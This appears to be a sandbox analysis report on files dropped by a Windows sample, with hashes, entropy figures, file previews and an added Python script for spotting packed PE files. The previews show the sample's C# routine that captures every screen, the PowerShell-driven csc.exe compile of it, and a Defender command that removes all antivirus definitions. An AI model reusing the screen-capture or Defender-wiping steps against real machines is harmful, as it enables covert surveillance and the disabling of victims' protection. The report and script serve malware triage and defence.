SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Preview: @...e...........................................................

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category: dropped
Size (bytes): 1004
Entropy (8bit): 4.154581034278981
Encrypted: false
SSDEEP: 24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
MD5: C76055A0388B713A1EABE16130684DC3
SHA1: EE11E84CF41D8A43340F7102E17660072906C402
SHA-256: 8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
SHA-512: 22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
Malicious: false
Preview: .using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: Unicode text, UTF-8 (with BOM) text, with very long lines (606), with no line terminators
Category: dropped
Size (bytes): 609
Entropy (8bit): 5.345416211192406
Encrypted: false
SSDEEP: 12:p37Lvkmb6KOkqe1xBkrk+ikq1S+UWZE21Sa9:V3ka6KOkqeFkq1SGE21S8
MD5: C75BB8F4B53BF36AA759CFB2433703F3
SHA1: C2D26F617B4CBA3AE3C58EDBD148915A7106F38E
SHA-256: 490B2C91D6BEBB7A5F6BD5F027A07BDCA33179B2A76B4CC9B0FD0F4B1BF36013
SHA-512: 08646EF7B2C662F189026C4D833A4EEA462596F0487989C040352DDE9B3EAF079487366A6F31DCA42E9E8AE0E72050C68A4ACFAF41120D49963BD20B3438997A
Malicious: true
Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.0.cs"

Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 4096
Entropy (8bit): 3.1584977481949865
Encrypted: false
SSDEEP: 48:6E7oEAtf0KhzBU/jf6mtJEN0qhPpW1ulXa3rq:wNz02mcOwFK
MD5: 396178D7BD49084F0957BB02C510907C
SHA1: 5230F16E4470C961AD3D5D962FDDDD6F2DB0F6CC
SHA-256: CFC542E14AB4D5AD9F3D2AC74D5AF6B0FA42E5AC52317A315E7F59DB527C0002
SHA-512: A6CF56A305AF06C2A44A4961C14A51C0C5BB421949DC0F97FCA8AE4FAF51B374435B6C0DF190F8B0D506E98F102B6498F1A55CA33C0EBCD5CD0581907EEA9DE4
Malicious: false

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: Unicode text, UTF-8 (with BOM) text, with very long lines (711), with CRLF, CR line terminators
Category: modified
Size (bytes): 1151
Entropy (8bit): 5.49067354150436
Encrypted: false
SSDEEP: 24:KLWId3ka6KOkqeFkq1SGE21SpKax5DqBVKVrdFAMBJTH:2Wkka6NkqeFkqLE22K2DcVKdBJj
MD5: 98A765EE721411A8D992CE5F7B85FB2D
SHA1: 72220851714C1AFDF0840898C32B3E67A100A661
SHA-256: 5BB2A594657B9B72ECFD1B9D8EC2480C3C26E63DE1FE3FCF498D50D55343212F
                                                                                                                                                                                                                                      SHA-512:EF3406254E63F87572FB71959337F58383AA302C61DCC2C3CBB3D20C418935B7D2D7295D63E4C751ACC0AFEED58061D85ACBD0ADFB725D01FC5DF4E20F2C9E8C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no lon
                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                      File Type:MSVC .res
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):652
                                                                                                                                                                                                                                      Entropy (8bit):3.100020444340795
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryhjak7YnqqQsPN5Dlq5J:+RI+ycuZhNXakSJPNnqX
                                                                                                                                                                                                                                      MD5:7E5B80053A0E290710F8DB920AB0071D
                                                                                                                                                                                                                                      SHA1:D30399DA5EFD8FB724E431573D285DE109B4CF0B
                                                                                                                                                                                                                                      SHA-256:5FC6195F2D0C56BC7F99223A1B2FEBEB0C5A84563EC716CC5506EF063B62FEFF
                                                                                                                                                                                                                                      SHA-512:471D33C65B6F34BAF1CDA0579833F7194383AF4FBE34120F51D509D3F9E0336E89EADBE24949874F1B8B9DE931BD74B00097FABCEBD426919A5E50428B732E30
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.l.f.c.h.n.c.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...3.l.f.c.h.n.c.2...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):707837
                                                                                                                                                                                                                                      Entropy (8bit):7.92829731962899
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:vx21cTsa/8X1wsAKc+GLZ9nTEmOAAtyjhji5/Hu8MHDJFj750po1Z2CvZE54:J21cQa/8XisSvTEmO/t4ZfHDJF6Kjniq
                                                                                                                                                                                                                                      MD5:AD9B44EF91FD3A3A9E9000B3E0C074EE
                                                                                                                                                                                                                                      SHA1:1959D98E7EFBCBB453AD8778F63FAC5382086C59
                                                                                                                                                                                                                                      SHA-256:64C69EC5C1C59023B0F1CE0D231F722CBE6D99751F54AD2D3A7475C836347265
                                                                                                                                                                                                                                      SHA-512:AB3B5694A1E15E92B102D15EB6C037F84EE07058B91BA4538C2750DBF12BFEE535BAD5EAB5AB01640062655F946463096E7F2929BA00F4C9A786EE06EC950C22
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....]...]U.t..........t8..nw.9.......(.DF..F..8...d.@.(..q76.`2.E@.$r. DF`......g};U.R..1~c...o..V..~.k.jg..z..Mx..qn~lE.....F[..F......6.3:.vz.{..^mD.uH_F=.W/..=-}..R?eu...J..b.@.vK...Q;q..;..~..k..^Z.....}..[R?&...9.~.m.;..~..oc..v....w........R?...w...A............1..>Y...B....B..O...{"....q.a....+...X.|..aQ?`E.......Q..C-......_..#..}_.y#....+........m..hI..|...?..../.......H.9.+.....U_ca......3.......!.yK}.]....0.s....w......}.].Zb.......d..y.1{...3.>....0...x..kM_..U0.w.G.}6.U.X.P.....}{.Q.&~..0~V.c.e.....b|..;7n..)6~...=c..1..3.uw_..f,......S...=...|.q{..&....G,..'/.k;/Ls...>.].......hs....K...%..w.s;/J.wZX.&.#L.=...6.v..q..q...........x?;...iA..xk.c..[.Vlk;....(1.K.n..%....Y...?n..R..b.;....{.pk.10...1.}....7..D..[..g.../H.y....}...zK......?=.o.X}.M......}M...ki'L.k..sS...j<.m....?%^7..)O.g...8=~.1f.......1...!...q-.t=.1...x.1F
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe
                                                                                                                                                                                                                                      File Type:RAR archive data, v5
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):757278
                                                                                                                                                                                                                                      Entropy (8bit):7.999752880302527
                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                      SSDEEP:12288:G+OaQtyoha5eeI8m37auSodL3f+7bpi+Toi2/NvHc/Gs96XXlGj/xY:GZpg5eGmL5DmxToi2/NvHaTkXXl4/C
                                                                                                                                                                                                                                      MD5:D5213D2D94937546AB9C9FC3B4553979
                                                                                                                                                                                                                                      SHA1:8F6DA4D884D614DC7583E0C673620D58C1777055
                                                                                                                                                                                                                                      SHA-256:18B1B4297D161A50E457CF82E3E3AB5E236B510AA8B97BCA5EEA8605F72FD592
                                                                                                                                                                                                                                      SHA-512:731503791F8E60CDF9124F8A7C19621C2CFA1A301CCF9FE8139629050796D175478A2D448A8F549580F248416ACF7A904D912E6B7E57AB821995CFA64A8EBA18
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Preview:Rar!.... ..`!.....K.}~D...9.......se..r....>.Ch.~s:..xGlD.r..;....";[...{b.;|.#b%p/.aQ....hd........w..g....H...B....t...)A:Rp.sj..#.g...y....4...%.t\@k8.ZX~.j......_........E"w..\.a`,U..@teq....7.`......+."d[.FX Dv.E.).O.*..v...%..+..........~n........-.`..+t{gaXW..ZW.$A5J..s...."..l..P.~7..@..6u ...z.q_.N.....t.....D....0..9.N...t5=n.W.>..{..[J....:..HiD.I9|....vg}......"/..D.|.3..d..4.U.k...V._.i=d.."....P.....i..r...+.G'#(.$9T.E....92b.;#..,.Y).._..d.....]:....)-k.V.............|>.....\z......'P.@G..\...o.gE.s.N_..{..;.Rs...*{ ..=.D...A.C?. ='!..L.z:.."!<.)...|....R.....=.gnQ.J\..F......-G..=..?.:N`3K.F.....#U.LC....r.`.0n..|.f../..(|....3...S..XF.c...s..g.x.,./ ..y.z.....uF.km.^.l....O`]....>.E.. 6...-.s.!.../tJ.........Bl.....<.M....;.~......'.j.OSak!&.....N.`.y1..t.....k......0a..........8...t...t...bT.0(\zOP)*...~...L7.!...^+..1.aCs.ND.>E/...|3."..#...>..A.......s."....n..7..T9.MfA.4...O+.....].1D......ig..q..W.(.Z(./4..]W.6...7Pq
                                                                                                                                                                                                                                      Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                      Size (bytes):894
                                                                                                                                                                                                                                      Entropy (8bit):3.1182182825683284
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:Q58KRBubdpkoPAGdjrZ6jCk9+MlWlLehW51IC46jP:QOaqdmOFdjrgB+kWResLIYL
                                                                                                                                                                                                                                      MD5:EA2A6252CE2DB0662B68EB774BA0F8EC
                                                                                                                                                                                                                                      SHA1:741E992DC9128E8174D18C3FDF5AF4ED91E22D23
                                                                                                                                                                                                                                      SHA-256:3B8F1F4E1D685E8825B2D5C264BBDE1E36EC21611F497DE523F686ACEA6B4242
                                                                                                                                                                                                                                      SHA-512:413CF79F74F79D81A4A31AEEE9B5C760BF809D8332CB60603B9BBD7EE2FB272001D5F5EA30678D38DF2D564CB26B60AC32D46E1DCA492FBAA78C1672921CA890
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. S.a.t. .. J.a.n. .. 0.4. .. 2.0.2.5. .0.3.:.4.2.:.1.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. S.a.t. .. J.a.n. .. 0.4. .. 2.0.2.5. .0.3.:.4.2.:.1.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....
                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ba, 9 symbols, created Sat Jan 4 09:43:01 2025, 1st section name ".debug$S"
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                      Entropy (8bit):4.121452491863558
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:H4gO9g1NP5tKHNwKa6NeI+ycuZhNXakSJPNnqSQEgd:YKPh4OKa6w1ulXa3rqSZ0
                                                                                                                                                                                                                                      MD5:70D3D306391DA5F2C405AD3CE2657C03
                                                                                                                                                                                                                                      SHA1:A1D38EC5C06BD314EE31E04085784FA865C094BB
                                                                                                                                                                                                                                      SHA-256:45959B632977A5529EA1B4A655A313720A6C717C5A0CB6267707B71B086DF172
                                                                                                                                                                                                                                      SHA-512:13C2F972CEB7A79F3F4E09A011336B0C277C19D56C8B81219AE714619D7347223BDA95AB07B7B7C7E8310647DC61B73D355562CFBA1BEBA46C254819B1522121
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:L.....yg.............debug$S........|...................@..B.rsrc$01........X.......`...........@..@.rsrc$02........P...j...............@..@........U....c:\Users\user\AppData\Local\Temp\3lfchnc2\CSC30375EB9C2504D3B856F38EEC7AAE920.TMP..................~[..:.)..................5.......C:\Users\user\AppData\Local\Temp\RESF89E.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.l.f.c.h.n.c.2...d.l.l.....(.....L.e.
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):109392
                                                                                                                                                                                                                                      Entropy (8bit):6.643764685776923
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:DcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/Auecbq8qZU34zW/K0zD:DV3iC0h9q4v6XjKAuecbq8qGISb/
                                                                                                                                                                                                                                      MD5:870FEA4E961E2FBD00110D3783E529BE
                                                                                                                                                                                                                                      SHA1:A948E65C6F73D7DA4FFDE4E8533C098A00CC7311
                                                                                                                                                                                                                                      SHA-256:76FDB83FDE238226B5BEBAF3392EE562E2CB7CA8D3EF75983BF5F9D6C7119644
                                                                                                                                                                                                                                      SHA-512:0B636A3CDEFA343EB4CB228B391BB657B5B4C20DF62889CD1BE44C7BEE94FFAD6EC82DC4DB79949EDEF576BFF57867E0D084E0A597BF7BF5C8E4ED1268477E88
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Joe Sandbox View:
• Filename: Holoscope-V1.3.5.exe, Detection: malicious
• Filename: dsoft.exe, Detection: malicious
• Filename: winws1.exe, Detection: malicious
• Filename: discord.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: cmd.exe, Detection: malicious
• Filename: NEVER OPEN!.exe, Detection: malicious
• Filename: HeilHitler.exe, Detection: malicious
• Filename: meN9qeS2DE.exe, Detection: malicious
• Filename: client1.exe, Detection: malicious
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........u...u...u.E.t...u.....u...t...u..v...u..q...u..p...u..u...u......u..w...u.Rich..u.........PE..d.....y..........." ...".....`.......................................................5....`A........................................`C..4....K...............p.......\..PO...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata.......p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................
Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):49432
Entropy (8bit):7.811659052043441
Encrypted:false
SSDEEP:768:0iulhAbgFQ1/NGSS1xNDrxiRx8/CWpsVDIA32w1Nep83IJCV1RU5YiSyvrjPxWER:0iiGgF1TxbYecf1R3IJCV1U7SyTjPxL
MD5:83B5D1943AC896A785DA5343614B16BC
SHA1:9D94B7F374030FED7F6E876434907561A496F5D9
SHA-256:BF79DDBFA1CC4DF7987224EE604C71D9E8E7775B9109BF4FF666AF189D89398A
SHA-512:5E7DCC80AC85BD6DFC4075863731EA8DA82EDBB3F8FFAFBA7B235660A1BD0C60F7DFDE2F7E835379388DE277F9C1CEAE7F209495F868CB2BD7DB0DE16495633C
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........u............l`.....h......h......h......h......h.....bh......l............bh.....bh.....bh.....bh.....Rich....................PE..d......c.........." ..."............pd....................................................`.............................................H.................... .. ..................................................pp..@...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
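The previews of the dropped DLLs from this record onward show UPX0/UPX1 section names and a "4.02.UPX!" trailer, and their 8-bit entropy sits around 7.7 to 7.9, whereas the first record above has a conventional .text/.rdata/.data/.rsrc layout. The script below is an added example, not part of the Joe Sandbox report or of the analysed sample, showing how an analyst can reproduce the two signals the report lists: the "Entropy (8bit)" figure (Shannon entropy in bits per byte) and the section names read from the PE section table, plus the UPX trailer check. Since the dropped files themselves are not on the page, build_sample_pe constructs synthetic PE32+ images (a hypothetical packed one and a hypothetical plain one) purely so the code runs offline; the function and variable names are the example's own.

```python
from __future__ import annotations

import hashlib
import math
import struct
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0), the measure a
    sandbox reports as 'Entropy (8bit)'. Packed or encrypted data sits near 8."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pe_section_names(data: bytes) -> list[str]:
    """Walk DOS header -> PE signature -> COFF header -> section table and
    return the 8-byte section names. Raises ValueError on a malformed image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                     # IMAGE_FILE_HEADER starts here
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + opt_size            # section table follows the optional header
    names = []
    for i in range(num_sections):
        raw = data[table + 40 * i: table + 40 * i + 8]
        if len(raw) < 8:
            raise ValueError("truncated section table")
        names.append(raw.rstrip(b"\0").decode("ascii", "replace"))
    return names


def looks_upx_packed(data: bytes) -> bool:
    """UPX leaves UPX0/UPX1 section names and a 'UPX!' marker in its trailer.
    Either alone is weak (section names are trivially renamed), so check both."""
    names = pe_section_names(data)
    return any(n.startswith("UPX") for n in names) or b"UPX!" in data


def triage(data: bytes) -> dict:
    """Summarise the signals the report lists for a dropped file."""
    return {
        "entropy": round(shannon_entropy(data), 3),
        "sections": pe_section_names(data),
        "upx": looks_upx_packed(data),
    }


# --- constructed test images (hypothetical, not the real dropped files) ---

def _prng_bytes(n: int, seed: bytes = b"example-seed") -> bytes:
    """Deterministic high-entropy filler standing in for a packed section."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


def build_sample_pe(section_names: list[str], payload: bytes) -> bytes:
    """Minimal PE32+ skeleton: DOS stub, PE signature, COFF header, a 240-byte
    optional header with the 0x20B magic, one 40-byte entry per section, payload."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x8664, len(section_names), 0, 0, 0, 240, 0x2022)
    opt = struct.pack("<H", 0x20B) + b"\0" * 238
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", n.encode("ascii"), 0, 0, 0, 0, 0, 0, 0, 0, 0)
        for n in section_names
    )
    return dos + b"PE\0\0" + coff + opt + table + payload


PACKED = build_sample_pe(["UPX0", "UPX1", ".rsrc"], _prng_bytes(8192) + b"4.02\0UPX!")
PLAIN = build_sample_pe([".text", ".rdata", ".data", ".rsrc"], b"\0" * 4000 + b"A" * 96)

if __name__ == "__main__":
    for label, img in (("packed", PACKED), ("plain", PLAIN)):
        print(label, triage(img))
```

Entropy near 8 only says the bytes are compressed or encrypted, not which packer produced them, and UPX0/UPX1 names disappear the moment someone patches the packer, so treat the two checks as triage hints and confirm with an unpacker or in-memory dump. The Joe Sandbox figures quoted above (7.81 for this record) are over the whole file including its low-entropy headers, which is why they land a little below the 8.0 ceiling.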
Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):59664
Entropy (8bit):7.830617969064045
Encrypted:false
SSDEEP:1536:nUOlRJUIp/i+OnIlnpJ8+j46IJLPF47SyHPxr:UOpnomlnpJPk6IJLPF4Vxr
MD5:7ECC651B0BCF9B93747A710D67F6C457
SHA1:EBB6DCD3998AF9FFF869184017F2106D7A9C18F3
SHA-256:B43963B0883BA2E99F2B7DD2110D33063071656C35E6575FCA203595C1C32B1A
SHA-512:1FF4837E100BC76F08F4F2E9A7314BCAF23EBFA4F9A82DC97615CDE1F3D29416004C6346E51AFC6E61360573DF5FCD2A3B692FD544CCAD5C616FB63AC49303C5
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........z..N...N...N...Gc..H....g..L....g..B....g..F....g..J....g..L....c..O....c..H....`..M...N........g..H....g..O....gv.O....g..O...RichN...........................PE..d....~.c.........." ...".........`.......p...................................0............`.........................................H,.......)....... .......................,..........................................@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc........ ......................@..............................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):109328
Entropy (8bit):7.930840371852251
Encrypted:false
SSDEEP:3072:pUOy4s97sRfmdE9MwgHYofX/oImJNdhK2cLxIJOqzCecxZ:pUObkNdEewJofPRmjdhKtqC/
MD5:0CFE09615338C6450AC48DD386F545FD
SHA1:61F5BD7D90EC51E4033956E9AE1CFDE9DC2544FE
SHA-256:A0FA3AD93F98F523D189A8DE951E42F70CC1446793098151FC50BA6B5565F2E3
SHA-512:42B293E58638074CE950775F5EF10EC1A0BB5980D0DF74AD89907A17F7016D68E56C6DED1338E9D04D19651F48448DEEE33A0657D3C03ADBA89406D6E5F10C18
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}RT...T...T...]...Z.......V.......Y.......\.......P.......W.......V...T..........U.......[.......U.......U.......U...RichT...................PE..d....~.c.........." ...".p..........P........................................0............`..........................................,..P....)....... ...........&...........-......................................P...@...........................................UPX0....................................UPX1.....p.......j..................@....rsrc........ .......n..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):36112
Entropy (8bit):7.6901751795487705
Encrypted:false
SSDEEP:768:Y1cXZ8iY8JshuGfJ5fA0EphrzIJOI40W5YiSyvVPxWExHd0:4SYZhu25I0OrzIJOI40s7SydPxPK
MD5:7EDB6C172C0E44913E166ABB50E6FBA6
SHA1:3F8C7D0FF8981D49843372572F93A6923F61E8ED
SHA-256:258AD0D7E8B2333B4B260530E14EBE6ABD12CAE0316C4549E276301E5865B531
SHA-512:2A59CC13A151D8800A29B4F9657165027E5BF62BE1D13C2E12529EF6B7674657435BFD3CC16500B2AA7CE95B405791DD007C01ADF4CDD229746BD2218BFDC03F
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A.g...g...g....2..g.......g.......g.......g.......g..g....g.......g.......g...g..!g..g....g..g....g..g.^..g..g....g..Rich.g..........................PE..d......c.........." ...".P..........P .......................................@............`..........................................;..P....9.......0..........,............;......................................P,..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........0.......R..............@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):87824
Entropy (8bit):7.9184368617158984
Encrypted:false
SSDEEP:1536:TxZh3A5zFTPuztVVQW1AyOXEyvYsnHUZK+K+k6V/busIJZ1Ow7SycfxPxPD:NvA5utzWfXE0V0ZK+K+ZdIJZ1Owqf1xL
MD5:71F0B9F90AA4BB5E605DF0EA58673578
SHA1:C7C01A11B47DC6A447C7475EF6BA7DEC7C7BA24E
